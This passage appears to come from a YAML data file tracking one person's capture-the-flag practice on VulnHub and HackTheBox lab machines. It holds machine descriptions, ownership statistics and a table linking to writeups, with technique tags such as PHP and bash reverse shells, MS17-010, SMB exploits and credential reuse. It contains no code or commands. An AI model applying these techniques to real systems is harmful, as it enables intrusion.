    - exploit_wordpress_plugin_hellodolly
    - exploit_php_reverseshell
    - privesc_mysql_creds
    - privesc_credsreuse
    url: https://www.vulnhub.com/entry/hackfest2016-quaoar,180/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf
  - datetime: 20190919
    infra: VulnHub
    machine:
      description: 'Welcome to Sedna

        This is a vulnerable machine i created for the Hackfest 2016 CTF

        http://hackfest.ca/

        Difficulty : Medium

        Tips:

        There are multiple way to root this box, if it should work but

        doesn''t try to gather more info about why its not working.

        Goals: This machine is intended to be doable by someone who have

        some experience in doing machine on vulnhub

        There are 4 flags on this machine

        One for a shell

        One for root access

        Two for doing post exploitation on Sedna

        Feedback: This is my second vulnerable machine, please give me

        feedback on how to improve !

        @ViperBlackSkull on Twitter

        [email protected]

        Special Thanks to madmantm for testing this virtual machine

        SHA-256 : 178306779A86965E0361AA20BA458C71F2C7AEB490F5FD8FAAFAEDAE18E0B0BA'
      difficulty: null
      difficulty_ratings: null
      id: 181
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png
      maker:
        id: 475
        name: Viper
        url: https://www.vulnhub.com/author/viper,475/
      matrixurl: null
      name: 'hackfest2016: Sedna'
      os: Linux
      oscplike: false
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 14 Mar 2017
      series:
        id: 111
        name: hackfest2016
        url: https://www.vulnhub.com/series/hackfest2016,111/
      shortname: 'hackfest2016: sedna'
      url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
      verbose_id: vulnhub#181
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_php_fileupload
            - exploit_php_reverseshell
            privesc:
            - privesc_chkrootkit
            - privesc_cron
            - privesc_bash_reverseshell
    name: 'hackfest2016: Sedna'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_php_fileupload
    - exploit_php_reverseshell
    - privesc_chkrootkit
    - privesc_cron
    - privesc_bash_reverseshell
    url: https://www.vulnhub.com/entry/hackfest2016-sedna,181/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf
  - datetime: 20190920
    infra: VulnHub
    machine:
      description: "Here we have a vulnerable Linux host with configuration weaknesses\
        \ rather than purposely vulnerable software versions (well at the time of\
        \ release anyway!)\nThe host is based upon Ubuntu Server 12.04 and is fully\
        \ patched as of early September 2012. The details are as follows:\nMD5 Hash\
        \ of Vulnix.7z: 0bf19d11836f72d22f30bf52cd585757\nDownload Vulnix from HERE\
        \ -\nThe goal; boot up, find the IP, hack away and obtain the trophy hidden\
        \ away in /root by any means you wish \u2013 excluding the actual hacking\
        \ of the vmdk \nFree free to contact me with any questions/comments using\
        \ the comments section below.\nEnjoy!\nSource: http://www.rebootuser.com/?p=933"
      difficulty: null
      difficulty_ratings: null
      id: 48
      infrastructure: vulnhub
      killchainurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png
      maker:
        id: 20
        name: Reboot User
        url: https://www.vulnhub.com/author/reboot-user,20/
      matrixurl: null
      name: 'HackLAB: Vulnix'
      os: Linux
      oscplike: true
      owned_root: true
      owned_user: true
      points: null
      private: false
      ratingsurl: null
      release: 10 Sep 2012
      series:
        id: 31
        name: HackLAB
        url: https://www.vulnhub.com/series/hacklab,31/
      shortname: 'hacklab: vulnix'
      url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
      verbose_id: vulnhub#48
      writeupmdurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.md
      writeuppdfurl: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
      writeups:
        7h3rAm:
          ttps:
            enumerate: []
            exploit:
            - exploit_nfs_rw
            - exploit_ssh_authorizedkeys
            privesc:
            - privesc_nfs_norootsquash
            - privesc_ssh_authorizedkeys
    name: 'HackLAB: Vulnix'
    overview: <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
      width="100" height="100" />
    points: 20
    status: public
    tags:
    - exploit_nfs_rw
    - exploit_ssh_authorizedkeys
    - privesc_nfs_norootsquash
    - privesc_ssh_authorizedkeys
    url: https://www.vulnhub.com/entry/hacklab-vulnix,48/
    writeup: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
  stats:
    counts: '|    #     |    TryHackMe    |    HackTheBox    |      VulnHub      |      OSCPlike     |       Owned       |

      |:--------:|:---------------:|:----------------:|:-----------------:|:-----------------:|:-----------------:|

      |  Total   | `1/591 (0.17%)` | `25/303 (8.25%)` |  `24/725 (3.31%)` | `46/254
      (18.11%)` | `50/1619 (3.09%)` |

      | Windows  |  `0/0 (0.00%)`  | `12/82 (14.63%)` |   `0/2 (0.00%)`   |  `12/39
      (30.77%)` |  `12/84 (14.29%)` |

      |   *nix   |  `0/0 (0.00%)`  | `13/221 (5.88%)` |  `24/723 (3.32%)` | `34/177
      (19.21%)` |  `37/944 (3.92%)` |

      | OSCPlike |  `0/38 (0.00%)` | `25/94 (26.60%)` | `21/122 (17.21%)` |                   |
      `46/254 (18.11%)` |'
    owned: '|  #  |                                                                                                                                                      Name                                                                                                                                                      |                                    Infra                                    |                                                               Killchain                                                                |                                                                                                                                                                                                                                                                                                                                                                                             TTPs                                                                                                                                                                                                                                                                                                                                                                                            |

      |:---:|:--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|:---------------------------------------------------------------------------:|:--------------------------------------------------------------------------------------------------------------------------------------:|:-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:|

      |  1. |                                                                                                             [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf)                                                                                                              |              [htb#287](https://app.hackthebox.eu/machines/287)              |            <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png"
      width="100" height="100"/>            |             [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb),
      [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access),
      [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql),
      [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig),
      [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login),
      [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell),
      [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history),
      [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login)            |

      |  2. |   [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/ratings.png"
      width="59" height="20"/>   |              [htb#118](https://app.hackthebox.eu/machines/118)              |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                          [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http),
      [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell),
      [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs)                                                                                                                                                                                                                         |

      |  3. |                                                                                                   [Billy
      Madison: 1.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf)                                                                                                   |        [vh#161](https://www.vulnhub.com/entry/billy-madison-11,161/)        |      <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/killchain.png"
      width="100" height="100"/>      |                                                                                                                                                                                                                                                                                      [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid),
      [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers)                                                                                                                                                                                                                                                                                      |

      |  4. |   [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/ratings.png"
      width="59" height="20"/>   |               [htb#48](https://app.hackthebox.eu/machines/48)               |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                          [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress),
      [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin),
      [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse),
      [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers)                                                                                                                                                                                                                         |

      |  5. |       [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/ratings.png"
      width="59" height="20"/>       |               [htb#51](https://app.hackthebox.eu/machines/51)               |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png"
      width="100" height="100"/>               |                                                                                                                                                                                                                                                                                                                                                      [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010)                                                                                                                                                                                                                                                                                                                                                      |

      |  6. |                                                                                                           [Brainpan:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf)                                                                                                           |            [vh#51](https://www.vulnhub.com/entry/brainpan-1,51/)            |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/killchain.png"
      width="100" height="100"/>           |                                                                                                                                                                                                                                                                                          [`exploit_bof`](https://github.com/7h3rAm/writeups#exploit_bof),
      [`privesc_anansi`](https://github.com/7h3rAm/writeups#privesc_anansi), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo)                                                                                                                                                                                                                                                                                          |

      |  7. |                                                                                      [BSides
      Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf)                                                                                       |
      [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/)
      | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png"
      width="100" height="100"/> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp),
      [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh),
      [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce),
      [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http),
      [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress),
      [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly),
      [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers)
      |

      |  8. |       [Buff](https://github.com/7h3rAm/writeups/blob/master/htb.buff/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/ratings.png"
      width="59" height="20"/>       |              [htb#263](https://app.hackthebox.eu/machines/263)              |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.buff/killchain.png"
      width="100" height="100"/>               |                                                                                                                                                                                                                                                                   [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http),
      [`exploit_gymsystem_rce`](https://github.com/7h3rAm/writeups#exploit_gymsystem_rce),
      [`exploit_cloudme_bof`](https://github.com/7h3rAm/writeups#exploit_cloudme_bof)                                                                                                                                                                                                                                                                   |

      |  9. |   [Cronos](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/ratings.png"
      width="59" height="20"/>   |               [htb#11](https://app.hackthebox.eu/machines/11)               |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                                                                                                                             [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli),
      [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron)                                                                                                                                                                                                                                                                                                                            |

      | 10. |                                                                                                                [DC:
      6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf)                                                                                                                 |              [vh#315](https://www.vulnhub.com/entry/dc-6,315/)              |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png"
      width="100" height="100"/>             |                                                                                                                                                                          [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress),
      [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor),
      [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds),
      [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap)                                                                                                                                                                          |

      | 11. |     [Devel](https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/ratings.png"
      width="59" height="20"/>     |                [htb#3](https://app.hackthebox.eu/machines/3)                |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.devel/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                             [`exploit_ftp_anonymous`](https://github.com/7h3rAm/writeups#exploit_ftp_anonymous),
      [`exploit_ftp_web_root`](https://github.com/7h3rAm/writeups#exploit_ftp_web_root),
      [`exploit_iis_asp_reverseshell`](https://github.com/7h3rAm/writeups#exploit_iis_asp_reverseshell),
      [`privesc_windows_ms11_046`](https://github.com/7h3rAm/writeups#privesc_windows_ms11_046)                                                                                                                                                                                                            |

      | 12. |                                                                                                     [Escalate_Linux:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf)                                                                                                      |        [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/)        |        <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png"
      width="100" height="100"/>        |                                                                                                                                                                                                                                                                   [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell),
      [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds),
      [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid)                                                                                                                                                                                                                                                                   |

      | 13. |                                                                                                    [FristiLeaks:
      1.3](https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/writeup.pdf)                                                                                                     |         [vh#133](https://www.vulnhub.com/entry/fristileaks-13,133/)         |      <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.fristileaks1dot3/killchain.png"
      width="100" height="100"/>       |                                                                                                                                                                                                                             [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload),
      [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass),
      [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid)                                                                                                                                                                                                                            |

      | 14. | [Grandpa](https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/matrix.png"
      width="59" height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/ratings.png"
      width="59" height="20"/> |               [htb#13](https://app.hackthebox.eu/machines/13)               |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/killchain.png"
      width="100" height="100"/>             |                                                                                                                                                                                                                                                                                                           [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav),
      [`privesc_windows_ms14_070`](https://github.com/7h3rAm/writeups#privesc_windows_ms14_070)                                                                                                                                                                                                                                                                                                          |

      | 15. |   [Granny](https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/ratings.png"
      width="59" height="20"/>   |               [htb#14](https://app.hackthebox.eu/machines/14)               |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.granny/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                                                                                                           [`exploit_iis_webdav`](https://github.com/7h3rAm/writeups#exploit_iis_webdav),
      [`privesc_windows_ms15_051`](https://github.com/7h3rAm/writeups#privesc_windows_ms15_051)                                                                                                                                                                                                                                                                                                          |

      | 16. |                                                                                                       [hackfest2016:
      Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf)                                                                                                        |       [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/)      |           <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png"
      width="100" height="100"/>            |                                                                                                          [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress),
      [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds),
      [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly),
      [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds),
      [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse)                                                                                                         |

      | 17. |                                                                                                        [hackfest2016:
      Sedna](https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/writeup.pdf)                                                                                                         |       [vh#181](https://www.vulnhub.com/entry/hackfest2016-sedna,181/)       |            <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.sedna/killchain.png"
      width="100" height="100"/>            |                                                                                                                                                                               [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload),
      [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`privesc_chkrootkit`](https://github.com/7h3rAm/writeups#privesc_chkrootkit),
      [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell)                                                                                                                                                                               |

      | 18. |                                                                                                          [HackLAB:
      Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf)                                                                                                          |          [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/)          |           <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png"
      width="100" height="100"/>            |                                                                                                                                                                                                                [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw),
      [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys),
      [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash),
      [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys)                                                                                                                                                                                                               |

      | 19. |                                                                                                             [hackme:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/writeup.pdf)                                                                                                             |            [vh#330](https://www.vulnhub.com/entry/hackme-1,330/)            |           <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.hackme/killchain.png"
      width="100" height="100"/>            |                                                                                                                                                                                                                                                                   [`exploit_php_fileupload`](https://github.com/7h3rAm/writeups#exploit_php_fileupload),
      [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid)                                                                                                                                                                                                                                                                   |

      | 20. |                                                                                                                [IMF:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/writeup.pdf)                                                                                                                |              [vh#162](https://www.vulnhub.com/entry/imf-1,162/)             |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.imf/killchain.png"
      width="100" height="100"/>             |                                                                                                                                                                                                                                                                                                             [`exploit_php_fileupload_bypass`](https://github.com/7h3rAm/writeups#exploit_php_fileupload_bypass),
      [`privesc_bof`](https://github.com/7h3rAm/writeups#privesc_bof)                                                                                                                                                                                                                                                                                                            |

      | 21. |                                                                                                    [InfoSec
      Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf)                                                                                                    |        [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/)       |       <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png"
      width="100" height="100"/>       |                                                                                                                                                                                                                                                                    [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http),
      [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys),
      [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash)                                                                                                                                                                                                                                                                    |

      | 22. |                                                                                                      [Kioptrix:
      2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf)                                                                                                       |          [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/)         |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png"
      width="100" height="100"/>          |                                                                                                                                                                                                                                                                                    [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart),
      [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd)                                                                                                                                                                                                                                                                                    |

      | 23. |                                                                                                     [Kioptrix:
      Level 1 (#1)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf)                                                                                                     |        [vh#22](https://www.vulnhub.com/entry/kioptrix-level-1-1,22/)        |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/killchain.png"
      width="100" height="100"/>          |                                                                                                                                                                                                                                                                                                                         [`exploit_modssl`](https://github.com/7h3rAm/writeups#exploit_modssl),
      [`privesc_modssl`](https://github.com/7h3rAm/writeups#privesc_modssl)                                                                                                                                                                                                                                                                                                                        |

      | 24. |                                                                                                    [Kioptrix:
      Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf)                                                                                                    |        [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/)       |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png"
      width="100" height="100"/>          |                                                                                                                                                                                                                                                                             [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli),
      [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend)                                                                                                                                                                                                                                                                             |

      | 25. |                                                                                                    [Kioptrix:
      Level 1.2 (#3)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/writeup.pdf)                                                                                                    |        [vh#24](https://www.vulnhub.com/entry/kioptrix-level-12-3,24/)       |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix3/killchain.png"
      width="100" height="100"/>          |                                                                                                                                                                                                                                                                                    [`exploit_lotuscms`](https://github.com/7h3rAm/writeups#exploit_lotuscms),
      [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo)                                                                                                                                                                                                                                                                                    |

      | 26. |                                                                                                    [Kioptrix:
      Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf)                                                                                                    |        [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/)       |          <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png"
      width="100" height="100"/>          |                                                                                                                                                                                               [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli),
      [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse),
      [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape),
      [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root),
      [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf)                                                                                                                                                                                               |

      | 27. |       [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/ratings.png"
      width="59" height="20"/>       |                [htb#1](https://app.hackthebox.eu/machines/1)                |              <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png"
      width="100" height="100"/>               |                                                                                                                                                                                                                                                                                                                                                       [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap)                                                                                                                                                                                                                                                                                                                                                       |

      | 28. |                                                                                                      [LazySysAdmin:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf)                                                                                                       |         [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/)         |        <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png"
      width="100" height="100"/>        |                                                                                       [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress),
      [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession),
      [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root),
      [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell),
      [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse),
      [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template),
      [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo)                                                                                       |

      | 29. |   [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf)<br/><img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/matrix.png" width="59"
      height="59"/><br/><img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/ratings.png"
      width="59" height="20"/>   |                [htb#2](https://app.hackthebox.eu/machines/2)                |             <img
      src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png"
      width="100" height="100"/>              |                                                                                                                                                                                                                                                                                                                                                      [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067)                                                                                                                                                                                                                                                                                                                                                      |

      | 30. |                                                                                                       [Lin.Security:
      1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf)                                                                                                       |          [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/)         |        <img
      src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png"
